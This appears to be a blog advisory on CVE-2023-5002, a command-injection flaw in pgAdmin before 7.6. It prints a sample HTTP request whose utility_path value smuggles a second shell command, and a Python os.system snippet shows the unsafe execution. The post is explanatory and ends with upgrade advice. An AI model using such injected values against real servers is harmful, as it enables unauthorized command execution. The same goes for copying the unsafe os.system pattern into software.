CVE-2023-5002 - Remote Command Execution in pgAdmin Before 7.6

If you're running pgAdmin to manage your PostgreSQL databases, you need to know about CVE-2023-5002. This vulnerability allows an authenticated user to execute arbitrary commands on the server running pgAdmin, and it’s surprisingly simple to exploit. In this post, I’ll break down what happened, how it works, show you some code, and tell you how to fix it.

What is CVE-2023-5002?

CVE-2023-5002 is a remote code execution vulnerability in pgAdmin (all versions before 7.6). The problem lies with how the server HTTP API checks the path a user provides for external PostgreSQL utilities like pg_dump and pg_restore. It doesn't do it properly - leading to major security consequences.

Simply put: If I'm logged in to pgAdmin, I can trick the server into running any command I want, not just safe database tools.

How Does the Vulnerability Work?

When you want to backup or restore a database using pgAdmin, the server allows you to choose a path to utilities like pg_dump. However, older versions of pgAdmin (before 7.6) only superficially checked this path. That means if I give it a path like /usr/bin/ls; id > /tmp/cve5002.txt, the server doesn’t stop me.

This is known as command injection. The server ends up executing not only pg_dump, but also my command: id > /tmp/cve5002.txt.

Example Exploit

Let’s see this in action. Here’s a simple code snippet showing what an attacker might submit via an HTTP request to the pgAdmin server's API:

POST /api/backups/start HTTP/1.1
Host: pgadmin.example.com
Content-Type: application/json
Authorization: Bearer <your_token_here>

{
    "utility_path": "/usr/bin/pg_dump; whoami > /tmp/hacked_by_cve5002.txt"
}

Behind the scenes, the utility_path is improperly validated and executed by the server like this

import os

# very simplified example
user_input = "/usr/bin/pg_dump; whoami > /tmp/hacked_by_cve5002.txt"
os.system(user_input)

After this runs, the file /tmp/hacked_by_cve5002.txt will contain the username of the running server process, demonstrating arbitrary command execution.

Responsible Disclosure and Patch

The maintainers of pgAdmin were notified and fixed this flaw in pgAdmin release 7.6. They now correctly sanitize and validate utility paths, preventing command injection.

Links and References

- pgAdmin 4 - Release Notes v7.6
- NVD - CVE-2023-5002
- pgAdmin Official Download

How Can You Stay Safe?

Upgrade to pgAdmin 7.6 or later.
If you manage pgAdmin on a server accessible by others, double-check your installation’s version and update it immediately.

General best practices:

Final Thoughts

CVE-2023-5002 illustrates how even trusted admin tools can have serious flaws. If not patched, a single login can give an attacker the keys to the kingdom. Make sure your pgAdmin installs are up to date, routinely check for vulnerabilities, and keep your critical infra safe!

If you want technical details or have questions, check out the original references above or reach out to the pgAdmin community.

Timeline

Published on: 09/22/2023 14:15:00 UTC
Last modified on: 10/04/2023 18:15:00 UTC